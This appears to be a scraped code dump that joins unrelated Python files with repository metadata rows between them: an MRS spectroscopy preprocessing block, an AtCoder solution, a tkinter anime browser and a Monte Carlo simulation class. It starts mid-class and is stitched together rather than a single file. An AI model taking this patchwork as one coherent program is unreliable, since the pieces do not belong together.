        self.fid_left_shift_phase0 = 56
        self.ref_spectrum_source = 'singlet_centered_in_range'
        self.ref_peak_line_width = 18
        self.constant_phase0_offset = 70 # degrees
        if attributes is not None:
            self.inflate(attributes)

    def __str__(self):
        # Python 2 idiom: __str__ delegates to __unicode__ and encodes UTF-8.
        return self.__unicode__().encode("utf-8")

    def __unicode__(self):
        # One-setting-per-line dump for logging/debugging.
        # NOTE(review): global_phase1 is serialized by deflate() but is not
        # listed here — confirm whether that omission is intentional.
        lines = [ ]
        lines.append("--- Block Preprocess Megalaser Settings ---")
        lines.append("fid_left_shift : " + unicode(self.fid_left_shift))
        lines.append("gaussian_apodization : " + unicode(self.gaussian_apodization))
        lines.append("apply_peak_shift : " + unicode(self.apply_peak_shift))
        lines.append("reference_peak_center : " + unicode(self.reference_peak_center))
        lines.append("peak_search_width : " + unicode(self.peak_search_width))
        lines.append("fid_left_shift_b0 : " + unicode(self.fid_left_shift_b0))
        lines.append("apply_phase0 : " + unicode(self.apply_phase0))
        lines.append("phase0_range_start : " + unicode(self.phase0_range_start))
        lines.append("phase0_range_end : " + unicode(self.phase0_range_end))
        lines.append("fid_left_shift_phase0 : " + unicode(self.fid_left_shift_phase0))
        lines.append("ref_spectrum_source : " + unicode(self.ref_spectrum_source))
        lines.append("ref_peak_line_width : " + unicode(self.ref_peak_line_width))
        lines.append("constant_phase0_offset : " + unicode(self.constant_phase0_offset))
        # __unicode__() must return a Unicode object. In practice the code
        # above always generates Unicode, but we ensure it here.
        return u'\n'.join(lines)

    def deflate(self, flavor=Deflate.ETREE):
        """Serialize the settings.

        :param flavor: ``Deflate.ETREE`` returns an ElementTree node (child
            order below defines the on-disk XML format); ``Deflate.DICTIONARY``
            returns a shallow copy of ``__dict__``.
        """
        if flavor == Deflate.ETREE:
            e = ElementTree.Element("settings", {"version" : self.XML_VERSION})
            util_xml.TextSubElement(e, "fid_left_shift", self.fid_left_shift)
            util_xml.TextSubElement(e, "gaussian_apodization", self.gaussian_apodization)
            util_xml.TextSubElement(e, "global_phase1", self.global_phase1)
            util_xml.TextSubElement(e, "apply_peak_shift", self.apply_peak_shift)
            util_xml.TextSubElement(e, "reference_peak_center", self.reference_peak_center)
            util_xml.TextSubElement(e, "peak_search_width", self.peak_search_width)
            util_xml.TextSubElement(e, "fid_left_shift_b0", self.fid_left_shift_b0)
            util_xml.TextSubElement(e, "apply_phase0", self.apply_phase0)
            util_xml.TextSubElement(e, "phase0_range_start", self.phase0_range_start)
            util_xml.TextSubElement(e, "phase0_range_end", self.phase0_range_end)
            util_xml.TextSubElement(e, "fid_left_shift_phase0", self.fid_left_shift_phase0)
            util_xml.TextSubElement(e, "ref_spectrum_source", self.ref_spectrum_source)
            util_xml.TextSubElement(e, "ref_peak_line_width", self.ref_peak_line_width)
            util_xml.TextSubElement(e, "constant_phase0_offset", self.constant_phase0_offset)
            return e
        elif flavor == Deflate.DICTIONARY:
            return self.__dict__.copy()

    def inflate(self, source):
        """Populate the settings from an ElementTree node or a dict.

        XML values are coerced to float/int/bool/str per the groups below;
        missing entries leave the current value untouched.
        """
        if hasattr(source, "makeelement"):
            # Quacks like an ElementTree.Element
            # float-valued settings
            for name in ("reference_peak_center",
                         "gaussian_apodization",
                         "peak_search_width",
                         "global_phase1",
                         'phase0_range_start',
                         'phase0_range_end'):
                item = source.findtext(name)
                if item is not None:
                    setattr(self, name, float(item))
            # int-valued settings
            for name in ("fid_left_shift",
                         "fid_left_shift_b0",
                         "fid_left_shift_phase0",
                         "ref_peak_line_width",
                         "constant_phase0_offset"):
                item = source.findtext(name)
                if item is not None:
                    setattr(self, name, int(item))
            # bool-valued settings
            for name in ("apply_peak_shift",
                         "apply_phase0", ):
                item = source.findtext(name)
                if item is not None:
                    setattr(self, name, util_xml.BOOLEANS[item])
            # string-valued settings
            for name in ("ref_spectrum_source",):
                item = source.findtext(name)
                if item is not None:
                    setattr(self, name, item)
        elif hasattr(source, "keys"):
            # Quacks like a dict
            for key in source.keys():
                if hasattr(self, key):
                    setattr(self, key, source[key])
class BlockPrepMegalaser(block_prep_identity.BlockPrepIdentity):
    """
    This is a building block object that can be used to create a list of
    processing blocks.
    This object represents preprocessing of the raw data from the first
    block ('raw') in the dataset.blocks list.
    We sub-class from BlockPrepIdentity base class to minimize recreating
    wheels, but to also leave us the flexibility of extending this class
    in the future for any 'special children' types of data loading.
    In here we also package all the functionality needed to save and recall
    these values to/from an XML node.
    """
    # The XML_VERSION enables us to change the XML output format in the future
    XML_VERSION = "1.0.0"

    def __init__(self, attributes=None):
        """
        Here we set up the standard functionality of the base class.

        :param attributes: optional ElementTree node or dict forwarded to
            ``inflate()`` after the defaults are set.
        """
        block_prep_identity.BlockPrepIdentity.__init__(self, attributes)
        #----------------------------------------
        # processing parameters
        self.set = _Settings()
        #----------------------------------------
        # results storage (sized later by _reset_dimensional_data)
        self.frequency_shift = None
        self.phase_0 = None
        self.data = None
        if attributes is not None:
            self.inflate(attributes)
        # processing chain; built on demand by create_chain()
        self.chain = None

    ##### Standard Methods and Properties #####################################
    # # This overrides the data property from the Identity class which is read
    # # only. This form allows us to read/write
    # def __get_data(self):
    #     return self._data
    # def __set_data(self, data):
    #     self._data = data
    # data = property(__get_data, __set_data)

    @property
    def dims(self):
        """Data dimensions in a list, e.g. [1024, 1, 1, 1]. It's read only."""
        # Note that self.data.shape is a tuple. Dims must be a list.
        if self.data is not None:
            return list(self.data.shape[::-1])
        return None

    def __str__(self):
        # Python 2 idiom: delegate to __unicode__ and encode as UTF-8 bytes.
        return self.__unicode__().encode("utf-8")

    def __unicode__(self):
        # Reuse the DataRaw dump but retitle it and append the data shape.
        lines = mrs_data_raw.DataRaw.__unicode__(self).split('\n')
        lines[0] = "----------- DataPrepMegalaser Object ------------"
        lines.append("Data shape : %s" % str(self.dims))
        return u'\n'.join(lines)

    def create_chain(self, dataset):
        """Create the processing chain bound to this block and *dataset*."""
        self.chain = chain_prep_megalaser.ChainPrepMegalaser(dataset, self)

    def set_dims(self, dataset):
        """
        Given a Dataset object, this is an opportunity for this block object
        to ensure that its dims match those of the parent dataset.
        """
        block.Block.set_dims(self, dataset)
        # local reference to input data
        raw = dataset.get_source_data('prep')
        # this is the calculated proper size for self.data
        fidsum_dims = [raw.shape[-1],1,1,1]
        if not self.dims or self.dims != fidsum_dims:
            self._reset_dimensional_data(dataset)

    def _reset_dimensional_data(self, dataset):
        """
        Resets (to zero) and resizes dimensionally-dependent data
        """
        # local reference to input data
        raw = dataset.get_source_data('prep')
        # one frequency shift / phase value per FID (second-to-last axis)
        n_fids = raw.shape[-2]
        self.frequency_shift = np.zeros([n_fids])
        self.phase_0 = np.zeros([n_fids])
        self.data = np.zeros((1,1,1,raw.shape[-1]), dtype=raw.dtype)
        if self.chain is not None:
            self.chain.reset_results_arrays()

    def concatenate(self, new):
        """Not supported for this block type."""
        raise NotImplementedError

    def deflate(self, flavor=Deflate.ETREE):
        """Serialize this block (settings + results) to XML or to a dict.

        Result arrays are only written when the block is not behaving as a
        preset, since presets carry settings only.
        """
        if flavor == Deflate.ETREE:
            e = ElementTree.Element("block_prep_megalaser",
                                    { "id" : self.id,
                                      "version" : self.XML_VERSION})
            util_xml.TextSubElement(e, "behave_as_preset", self.behave_as_preset)
            # Now I deflate the attribs that are specific to this class
            e.append(self.set.deflate())
            if not self.behave_as_preset:
                e.append(util_xml.numpy_array_to_element(self.frequency_shift,'frequency_shift'))
                e.append(util_xml.numpy_array_to_element(self.phase_0,'phase_0'))
                e.append(util_xml.numpy_array_to_element(self.data, 'data'))
            return e
        elif flavor == Deflate.DICTIONARY:
            return self.__dict__.copy()

    def inflate(self, source):
        """Restore this block from an XML node or a dict (mirror of deflate)."""
        if hasattr(source, "makeelement"):
            val = source.findtext("behave_as_preset") # default is False
            if val is not None:
                self.behave_as_preset = util_xml.BOOLEANS[val]
            # Quacks like an ElementTree.Element
            self.set = _Settings(source.find("settings"))
            if not self.behave_as_preset:
                # Now I inflate the attribs that are specific to this class
                temp = source.find("frequency_shift")
                self.frequency_shift = util_xml.element_to_numpy_array(temp)
                temp = source.find("phase_0")
                self.phase_0 = util_xml.element_to_numpy_array(temp)
                temp = source.find("data")
                self.data = util_xml.element_to_numpy_array(temp)
        elif hasattr(source, "keys"):
            # Quacks like a dict; only the "set" entry is honored here.
            for key in source.keys():
                if key == "set":
                    setattr(self, key, source[key])

    ##### Private Methods #####################################
| [
"bsoher@briansoher.com"
] | bsoher@briansoher.com |
91cf1bbafb30679fda22289ccab052d7605c72e6 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /typical90/typical90_cf.py | f610d0f1035ed452bc7992ce2b7ed0d6160b139f | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | # https://atcoder.jp/contests/typical90/tasks/typical90_cf
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
N = int(input())
S = input()
# For every prefix that already contains both an 'o' and an 'x', the number of
# split points is 1 + the smaller of the two most recent positions.
ans = 0
last_o = -1
last_x = -1
for i in range(N):
    if S[i] == 'o':
        last_o = i
    else:
        last_x = i
    if last_o != -1 and last_x != -1:
        ans += min(last_o, last_x) + 1
print(ans)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
| [
"hironobukawaguchi3@gmail.com"
] | hironobukawaguchi3@gmail.com |
f8f04d4798e994490ad6ecaf3e1eb17c2424110d | ed72797056e0a3013dc61c81399bd8b56042787a | /src/frame/home_frame.py | 04cda5cf5df03425e53af75d53c46fac99163cdc | [] | no_license | pooetitu/anime-companion | 95f5088cbc470559bb650d4d6f830a58c7005999 | 6aea8e805c7f5adf976882988a8a9b7ef2394440 | refs/heads/master | 2023-06-22T16:21:58.104600 | 2021-07-25T19:03:21 | 2021-07-25T19:03:21 | 376,633,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | from tkinter import ttk
import requests
from kitsu.models import Anime
from src.cards.anime_info_card import AnimeInfoCard
from src.frame.scrollable_frame import ScrollableFrame
class HomeFrame(ttk.Frame):
    """Landing frame listing the currently trending anime as clickable cards."""

    def __init__(self, function_display_anime_details, master=None):
        super().__init__(master)
        self.master = master
        self.function_display_anime_details = function_display_anime_details
        self.pack()
        self.anime_list = []
        # Scrollable container that will hold one card per trending anime.
        self.scrollable = ScrollableFrame(self)
        self.scrollable.pack(fill='both', expand=1)
        self.create_widgets()

    def create_widgets(self):
        """Build the frame's content (currently just the trending list)."""
        self.load_trend()

    def load_trend(self):
        """Fetch the top 9 trending anime from the Kitsu API and add a card for each."""
        payload = requests.get("https://kitsu.io/api/edge/trending/anime?limit=9").json()
        for entry in payload['data']:
            card = AnimeInfoCard(Anime("anime", entry),
                                 self.function_display_anime_details,
                                 master=self.scrollable.scrollable_frame)
            self.anime_list.append(card)
            card.pack(pady=5, fill='both', expand=1)
| [
"pooetitu@gmail.com"
] | pooetitu@gmail.com |
f5783ec97d4eb45d76b501c9cb44fb45c9fa027e | 96872bbac90845189ac1276b91795ce6253442f5 | /class-activities/loopActivity.py | 158493003486f4bc9b4667571b53002f366c5ddf | [] | no_license | rubenavaldez/Python-sandbox | 4e9d1ff609cd4a70d5f8ea0eb70d576d2f438e5a | 02a02a899f4aa66f3b7b7fa28a020cb22ebb40cc | refs/heads/master | 2022-10-13T00:48:54.547441 | 2019-10-29T05:34:34 | 2019-10-29T05:34:34 | 218,170,216 | 0 | 1 | null | 2022-10-07T02:11:38 | 2019-10-29T00:22:35 | Python | UTF-8 | Python | false | false | 1,160 | py | correctAnswer = False
# Gate the rest of the program behind a simple arithmetic check.
while True:
    answer = input("What is 2 + 2?")
    if answer == "4":
        print("Correct!")
        break
    print("Incorrect!")
friendlies = []
# Ask for the user's name until they confirm the spelling.
while True:
    yourName = input("What is your name?")
    print("We have", yourName, " saved as your name.")
    if input("is this information correct?") == "yes":
        break
# Offer to record friends until the user answers anything but "yes".
while True:
    if input("Would you like to add a new friend?") != "yes":
        break
    # Confirm each friend's name before it is stored.
    while True:
        friendName = input("What is your friend's name?")
        print("We have", friendName, " saved as your friend's name.")
        if input("is this information correct?") == "yes":
            friendlies.append(friendName)
            break
print(yourName, ", we have successfuly added your friends:")
i = 0
while i < len(friendlies):
print(friendlies[i])
i += 1 | [
"ruben.valdez7@gmail.com"
] | ruben.valdez7@gmail.com |
fdcc8e2352fb90f3dce50f2dab1f09b450c20e09 | dc4d01e9de93e2538a8ce6fd52d9c42d26fa4bb5 | /week04/evil-loopy-lists.py | 7a94be418658fabefba21affca71cb9a77682d21 | [] | no_license | katiecla/CA268 | 27e5e867977aca11b46f642660ab4ad88d90f6a7 | 1607ff781da20d5ac0a3e617a4b06451f36d5ca2 | refs/heads/master | 2022-03-29T09:09:58.912601 | 2020-01-24T15:22:43 | 2020-01-24T15:22:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | def detect_loop(lst):
root = lst.head
ptr = lst.head
while ptr != None:
if ptr.next == root:
return True
ptr = ptr.next
return False | [
"noreply@github.com"
] | noreply@github.com |
84e3065e22fd5fe1e88286d0f462bcf02326e85b | ba94c9951adcde0392ab673fc0bb5fff7e422f40 | /main.py | 1b159e4cc71ebff07177891fc9b807ef83a3c673 | [] | no_license | georgwassen/Reports | 4c21491be0a599bee45f1f710c6ee75172ae3a13 | 785b16d2823fc63b20b16e5fb425a78d8dfda887 | refs/heads/master | 2021-01-19T13:14:28.041250 | 2014-06-02T10:07:53 | 2014-06-02T10:07:53 | 20,394,766 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #!/usr/bin/env python
from storm.locals import *
import data_def
import generate_data
import reports
if __name__ == "__main__":
    #database = create_database("sqlite:test.db")
    # "sqlite:" with no path gives an in-memory database, so every run starts
    # from scratch (the file-backed variant above is kept for reference).
    database = create_database("sqlite:")
    store = Store(database)
    data_def.create_db(store)               # create the schema
    generate_data.generate_testdata(store)  # populate it with generated test data
    store.commit()
    reports.meldungen(store)                # run the "meldungen" report on the store
| [
"georg.wassen@googlemail.com"
] | georg.wassen@googlemail.com |
737f03f10ca5c122cad3e6ecd1ea3ca167ba591a | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_7114.py | 43772d7ec5384a7033d876749b4875f9abf3a978 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | # global name 'find' is not defined
'python'.find('y') # gives 1 — find is a str *method*, not a global function; call it on the string itself
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
eb7c26a791fa2b8b0975f500d74956c92c74716c | f36ba856476a99592e5570f13c9d321d9b914bde | /maskrcnn_benchmark/modeling/roi_heads/soft_roi_heads.py | 55afdce3de9aff40204efb7d0102929cf812a421 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | huajianni666/maskrcnn-benchmark-distillation | 1448b7c94e723833463efec4c2744097adf7b83b | 8543f26c44a8f0a4d178548bd08471bf53498381 | refs/heads/master | 2020-04-02T16:01:57.402542 | 2019-02-18T06:08:57 | 2019-02-18T06:08:57 | 154,594,906 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch
from .box_head.soft_box_head import build_soft_roi_box_head
from .mask_head.mask_head import build_roi_mask_head
class CombinedROIHeads(torch.nn.ModuleDict):
    """
    Bundles the individual ROI heads (box, and optionally mask) behind one
    module, forwarding teacher/student features through each head in turn.
    """
    def __init__(self, teacher_cfg, student_cfg, heads):
        super(CombinedROIHeads, self).__init__(heads)
        self.teacher_cfg = teacher_cfg.clone()
        self.student_cfg = student_cfg.clone()
        # When the mask head is configured to share the box head's feature
        # extractor, wire it to the student-side extractor once, up front.
        share_extractor = (student_cfg.MODEL.MASK_ON
                           and student_cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR)
        if share_extractor:
            self.mask.feature_extractor = self.box.student_feature_extractor

    def forward(self, teacher_features, student_features, teacher_proposals, student_proposals, targets=None):
        # Box head first; it also produces the detections used downstream.
        box_x, detections, box_losses = self.box(
            teacher_features, student_features,
            teacher_proposals, student_proposals, targets)
        all_losses = dict(box_losses)
        if not self.student_cfg.MODEL.MASK_ON:
            return box_x, detections, all_losses
        # Optimization: reuse the box features during training when the
        # feature extractor is shared between the box and mask heads.
        if self.training and self.student_cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR:
            mask_input = box_x
        else:
            mask_input = student_features
        # During training, self.box() returns the unaltered proposals as
        # "detections", keeping the API consistent between train and test.
        mask_x, detections, mask_losses = self.mask(mask_input, detections, targets)
        all_losses.update(mask_losses)
        return mask_x, detections, all_losses
def build_soft_roi_heads(teacher_cfg, student_cfg):
    """Assemble the ROI heads enabled by *student_cfg* into one module.

    Returns an empty list when no head is enabled (RPN-only models);
    otherwise a :class:`CombinedROIHeads` wrapping the enabled heads.
    """
    heads = []
    if not student_cfg.MODEL.RPN_ONLY:
        heads.append(("box", build_soft_roi_box_head(teacher_cfg, student_cfg)))
    if student_cfg.MODEL.MASK_ON:
        heads.append(("mask", build_roi_mask_head(student_cfg)))
    # Combine the individual heads into a single module, or pass [] through.
    return CombinedROIHeads(teacher_cfg, student_cfg, heads) if heads else heads
| [
"gezishuai@qiniu.com"
] | gezishuai@qiniu.com |
07a345dba33878564304037a609dba06de767c0c | 36c00fe2afff4818c937e312ce0c6a79f35e2a77 | /7-kyu/happy-birthday,-darling!/python/solution.py | ab407ea9bcebd79b2d18c37ed24e86ac2368a137 | [] | no_license | p-lots/codewars | 0a67b6ee4c91180ff78c648421b9d2d64463ddc3 | 535faeee475c6b398124d6f5002b0e111406e8bb | refs/heads/master | 2023-08-23T22:14:33.635011 | 2023-08-23T13:30:37 | 2023-08-23T13:30:37 | 195,320,309 | 0 | 0 | null | 2023-05-09T19:25:50 | 2019-07-05T01:40:15 | Python | UTF-8 | Python | false | false | 164 | py | def womens_age(n):
base = n // 2 if n % 2 == 0 else (n - 1) // 2
new_n = 20 if n % 2 == 0 else 21
return f"{n}? That's just {new_n}, in base {base}!" | [
"paul.calotta@gmail.com"
] | paul.calotta@gmail.com |
238eb7c3a48a487377b765829fcb5eee86416ff5 | 24cf311c53c29e4e332cea01ee4de8196253a7b7 | /accounts/urls.py | ca8992d712669175ee1ef3193b0ea2d6ab348261 | [] | no_license | apengok/vsicravdoa | d017fe0c6a8606ef7bb74739354de1a2767b2a8a | e424b94007731189c2f14513798f2a9e9a45ba4c | refs/heads/master | 2020-03-10T23:07:48.145583 | 2018-06-01T09:18:25 | 2018-06-01T09:18:25 | 129,634,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from django.conf.urls import url
from .views import (
AccountHomeView,
# AccountEmailActivateView,
UserDetailUpdateView
)
app_name = 'account'
urlpatterns = [
url(r'^$', AccountHomeView.as_view(), name='home'),
url(r'^details/$', UserDetailUpdateView.as_view(), name='user-update'),
# url(r'history/products/$', UserProductHistoryView.as_view(), name='user-product-history'),
# url(r'^email/confirm/(?P<key>[0-9A-Za-z]+)/$',
# AccountEmailActivateView.as_view(),
# name='email-activate'),
# url(r'^email/resend-activation/$',
# AccountEmailActivateView.as_view(),
# name='resend-activation'),
]
# account/email/confirm/asdfads/ -> activation view | [
"apengok@163.com"
] | apengok@163.com |
053161aa0ab152db24a739446745c4bc030409d9 | d7ca0cf469418971be2bc5d6dd65bc28ba74f71a | /pymcsl/montecarlosimulation.py | b7b8fddd1b47ce28c14ae23ffe650f5719ea3de4 | [
"MIT"
] | permissive | FilipeChagasDev/PyMCSL | a6b19df23841fffd8db088b4d9925e61b1ea7695 | 8713a1dc73b0ea8e4d9636c970c98077b5923cc4 | refs/heads/main | 2023-04-07T22:19:51.854371 | 2022-06-10T07:46:52 | 2022-06-10T07:46:52 | 500,016,774 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,525 | py | """
By Filipe Chagas
June-2022
"""
from typing import *
import numpy as np
from subsimulation import SubSimulationEnv, ContextType
def _first_or_default(l: List, f: Callable[[Any], bool], default: Any = None) -> Any:
for x in l:
if f(x):
return x
return default
class MonteCarloSimulationEnv():
"""
The MonteCarloSimulationEnv class provides a code base to facilitate the implementation of Monte Carlo simulations.
The MonteCarloSimulationEnv class performs a series of independent subsimulations under the same conditions.
"""
    def __init__(self, variables: List[Tuple[str, type, Union[str, int, float, bool]]], n_subsimulations: int, n_steps: int) -> None:
        """
        :param variables: List of simulation variables in the format [(variable_name, variable_type, default_value)].
        :type variables: List[Tuple[str, type, Union[str, int, float, bool]]]
        :param n_subsimulations: Number of subsimulations.
        :type n_subsimulations: int
        :param n_steps: Number of steps per subsimulation.
        :type n_steps: int
        :raises AssertionError: if any argument fails the validations below.
        """
        # --- eager argument validation ---
        assert isinstance(n_subsimulations, int), f'Argument of \'n_subsimulations\' must be integer. Given {type(n_subsimulations)}.'
        assert n_subsimulations > 0, f'n_subsimulations must be positive. Given {n_subsimulations}.'
        assert isinstance(n_steps, int), f'Argument of \'n_steps\' must be integer. Given {type(n_steps)}.'
        assert n_steps > 0, f'n_steps must be positive. Given {n_steps}.'
        assert isinstance(variables, list), f'Argument of \'variables\' must be a list, but a {type(variables)} object was received.'
        assert all([isinstance(var_name, str) for var_name, var_type, var_default in variables]), f'\'variables\' list must be in the format [(string, type, object)].'
        assert all([isinstance(var_type, type) for var_name, var_type, var_default in variables]), f'\'variables\' list must be in the format [(string, type, object)].'
        assert all([var_type in (str, int, float, bool) for var_name, var_type, var_default in variables]), f'variable types must be int, float, str or bool.'
        assert all([isinstance(var_default, var_type) for var_name, var_type, var_default in variables]), f'Some default value in \'variables\' list does not correspond to its variable\'s type.'
        assert all([var_name not in ('past', 'getstate', 'setstate') for var_name, var_type, var_default in variables]), 'Names \'past\', \'getstate\' and \'setstate\' are internally reserved and forbidden for variables.'
        self._variables = variables
        self._n_subsims = n_subsimulations
        self._n_steps = n_steps
        # Callbacks are registered later via the decorator properties or the
        # set_* methods; the environments are created by run(). Until then
        # these stay None.
        self._subsim_begin_function = None
        self._subsim_step_function = None
        self._subsim_envs = None
@property
def subsim_begin(self) -> Callable:
"""Returns a decorator that subscribes a function as the beginning function of all subsimulations.
:return: Wrapped decorator.
:rtype: Callable
"""
def wrapped(function: Callable[[ContextType], None]) -> Callable:
self._subsim_begin_function = function
return function
return wrapped
@property
def subsim_step(self) -> Callable:
"""Returns a decorator that subscribes a function as the step-function of all subsimulations.
:return: Wrapped decorator.
:rtype: Callable
"""
def wrapped(function: Callable[[ContextType], None]) -> Callable:
self._subsim_step_function = function
return function
return wrapped
    def set_subsim_begin_callback(self, f: Callable[[ContextType], None]):
        """Subscribes a function as the begin-function of all subsimulations.

        Non-decorator alternative to the ``subsim_begin`` property.

        :param f: Callback function.
        :type f: Callable[[ContextType], None]
        :raises AssertionError: if *f* is not callable.
        """
        assert isinstance(f, Callable)
        self._subsim_begin_function = f
    def set_subsim_step_callback(self, f: Callable[[ContextType], None]):
        """Subscribes a function as the step-function of all subsimulations.

        Non-decorator alternative to the ``subsim_step`` property.

        :param f: Callback function.
        :type f: Callable[[ContextType], None]
        :raises AssertionError: if *f* is not callable.
        """
        assert isinstance(f, Callable)
        self._subsim_step_function = f
def run(self, show_progress: bool = True):
"""Run all the independent subsimulations.
:param show_progress: Enable progress bar, defaults to True
:type show_progress: bool, optional
"""
assert isinstance(self._subsim_begin_function, Callable), 'Begin callback is not defined.'
assert isinstance(self._subsim_step_function, Callable), 'Step callback is not defined.'
if show_progress:
from tqdm import tqdm
self._subsim_envs = [SubSimulationEnv(self._variables, self._subsim_begin_function, self._subsim_step_function) for i in range(self._n_subsims)]
for env in tqdm(self._subsim_envs) if show_progress else self._subsim_envs:
env.run_steps(self._n_steps)
    def get_subsim_env(self, subsim_index: int) -> SubSimulationEnv:
        """Returns the SubSimulationEnv for a specific subsimulation.

        Only meaningful after ``run()`` has been called; before that,
        ``_subsim_envs`` is still ``None`` and indexing it will fail.

        :param subsim_index: subsimulation index (starting at 0).
        :type subsim_index: int
        :return: SubSimulationEnv object.
        :rtype: SubSimulationEnv
        """
        # NOTE(review): negative indexes are not rejected here and would
        # index from the end of the list — confirm whether that is intended.
        assert subsim_index < self._n_subsims, f'subsim_index must be less than the number of subsimulations.'
        return self._subsim_envs[subsim_index]
def get_variable_mean(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, np.float]:
"""
Calculates the mean of a variable.
The 0-axis indexes are the domain values (step indexes or subsim indexes).
:param var_name: Variable name.
:type var_name: str
:param domain: If domain='step', an average for each step is calculated; if domain='subsim', an average for each subsimulation is calculated, and if domain=None, the overall average is calculated, defaults to 'time'
:type domain: str, optional
:return: An array with an average for each domain value (step or subsim), or an overall average.
:rtype: Union[np.ndarray, np.float]
"""
assert isinstance(var_name, str), 'var_name must be string.'
assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0]==var_name, (None, None, None))
assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
hist = [self._subsim_envs[i].get_variable_numpy_history(var_name) for i in range(self._n_subsims)]
return np.mean(hist, axis=(0 if domain == 'step' else 1)).astype(np.float) if domain != None else np.mean(hist).astype(np.float)
def get_variable_median(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the median of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a median for each step is calculated; if domain='subsim', a median for each subsimulation is calculated, and if domain=None, the overall median is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a median for each domain value (step or subsim), or an overall median.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.median(hist).astype(float)
    return np.median(hist, axis=0 if domain == 'step' else 1).astype(float)
def get_variable_var(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the variance of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a variance for each step is calculated; if domain='subsim', a variance for each subsimulation is calculated, and if domain=None, the overall variance is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a variance for each domain value (step or subsim), or an overall variance.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.var(hist).astype(float)
    return np.var(hist, axis=0 if domain == 'step' else 1).astype(float)
def get_variable_std(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the standard deviation of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a standard deviation for each step is calculated; if domain='subsim', a standard deviation for each subsimulation is calculated, and if domain=None, the overall standard deviation is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a standard deviation for each domain value (step or subsim), or an overall standard deviation.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.std(hist).astype(float)
    return np.std(hist, axis=0 if domain == 'step' else 1).astype(float)
